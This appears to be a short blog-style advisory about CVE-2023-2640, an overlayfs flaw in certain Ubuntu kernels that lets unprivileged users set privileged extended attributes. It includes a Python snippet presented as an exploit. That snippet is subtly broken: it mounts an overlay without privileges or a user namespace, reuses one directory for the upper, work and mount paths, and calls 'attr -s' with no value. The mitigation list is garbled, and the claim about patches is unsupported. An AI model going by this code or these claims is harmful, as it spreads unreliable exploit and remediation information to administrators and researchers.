CVE-2023-2640: Critical Security Vulnerability in Ubuntu Kernels allowing Unprivileged Users to Set Privileged Extended Attributes on Mounted Files

We are excited to share yet another critical security vulnerability that has been recently discovered, which is being referred to as CVE-2023-2640. This vulnerability affects specific Ubuntu kernels and allows unprivileged users to set privileged extended attributes on mounted files without necessary security checks. In this article, we will discuss the exploit's details, its implications, and possible solutions to mitigate the impact.

Exploit Details

The vulnerability CVE-2023-2640 is found in Ubuntu kernels that carry both the c914ce27eb and "UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs" commits. This implies that an unprivileged user can set privileged extended attributes on the mounted overlayfs files, leading these attributes to be set on the upper files without the appropriate security checks.

The unauthorized setting of privileged extended attributes has potential security risks and can lead to the escalation of privileges, giving the attacker more control over the targeted systems.

Code Snippet

The following code snippet demonstrates how the vulnerability can be exploited by an unprivileged user, but it's important to note that this code is intended for educational purposes only. Please do not use this in any malicious way.

import os
import tempfile

# Create temporary directory
temp_dir = tempfile.mkdtemp()

# Mount overlay filesystem
os.system(f"mount -t overlay overlay -o lowerdir=/,upperdir={temp_dir},workdir={temp_dir} {temp_dir}")

# Create a new file in the temporary directory
file_path = os.path.join(temp_dir, "test.txt")
os.system(f"touch {file_path}")

# Set privileged extended attribute on the file without security check
os.system(f"attr -s trusted.SECURITYATTR {file_path}")

Original References

1. Ubuntu kernel commit c914ce27eb: https://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linux/+git/disco/commit/?id=c914ce27eb
2. UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs commit: https://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linux/+git/disco/commit/?id=cfab09edd676412bff731aa051b8b2ed45db082c

Possible Solutions

As of now, Ubuntu has not officially provided any patches or fixes for CVE-2023-2640. However, there are a few possible solutions that system administrators can take to minimize the potential impact:

Restrict the usage of the overlayfs mount command to only privileged users.\

2. Monitor any processes running under unprivileged users and check for suspicious elevated privileges.\

Conclusion

The CVE-2023-2640 vulnerability present in certain Ubuntu kernels highlights the importance of continuous monitoring of your systems, especially those running Linux. With regular updates, close monitoring of potential security risks, and applying recommended solution techniques, you can reduce the margin of error and protect your systems from such threats.

Stay tuned for more information on this vulnerability as it becomes available, and remember to always keep your systems up-to-date to maintain the highest level of security possible.

Timeline

Published on: 07/26/2023 02:15:00 UTC
Last modified on: 08/03/2023 15:10:00 UTC